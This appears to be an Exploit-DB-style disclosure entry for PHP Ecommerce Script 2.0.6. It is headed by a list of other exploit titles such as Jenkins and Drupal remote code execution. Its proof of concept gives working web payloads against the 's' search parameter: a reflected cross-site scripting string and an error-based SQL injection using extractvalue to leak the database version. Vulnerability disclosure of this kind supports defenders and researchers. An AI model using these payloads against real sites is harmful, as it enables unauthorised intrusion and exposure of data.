bb86158c6e
7 changes to exploits/shellcodes Xlight FTP Server 3.9.1 - Buffer Overflow (PoC) Jenkins - Remote Code Execution Jenkins Plugin Script Security < 1.50/Declarative < 1.3.4.1/Groovy < 2.61.1 - Remote Code Execution (PoC) Jenkins Plugin Script Security 1.49/Declarative 1.3.4/Groovy 2.60 - Remote Code Execution zzzphp CMS 1.6.1 - Remote Code Execution PHP Ecommerce Script 2.0.6 - Cross-Site Scripting / SQL Injection News Website Script 2.0.5 - SQL Injection Advance Gift Shop Pro Script 2.0.3 - SQL Injection Drupal < 8.6.9 - REST Module Remote Code Execution
21 lines
No EOL
667 B
Text
21 lines
No EOL
667 B
Text
# Exploit Title: PHP Ecommerce Script 2.0.6 - Cross Site Scripting / SQL Injection
|
|
# Exploit Author: Mr Winst0n
|
|
# Author E-mail: manamtabeshekan[@]gmail[.]com
|
|
# Discovery Date: February 22, 2019
|
|
# Vendor Homepage: http://www.phpscriptsmall.com/
|
|
# Software Link : https://www.phpscriptsmall.com/product/php-ecommerce-script/
|
|
# Tested Version: 2.0.6
|
|
# Tested on: Kali linux, Windows 8.1
|
|
|
|
|
|
# PoC:
|
|
|
|
# Cross Site Scripting:
|
|
|
|
# http://localhost/[PATH]/?s=[XSS]
|
|
# http://localhost/[PATH]/?s=<scRiPt>alert(1)</ScrIpT>
|
|
|
|
# SQL Injection:
|
|
|
|
# http://localhost/[PATH]/?s=[SQL]
|
|
# http://localhost/[PATH]/?s=1%20and%20extractvalue(rand(),concat(0x7e,version())) |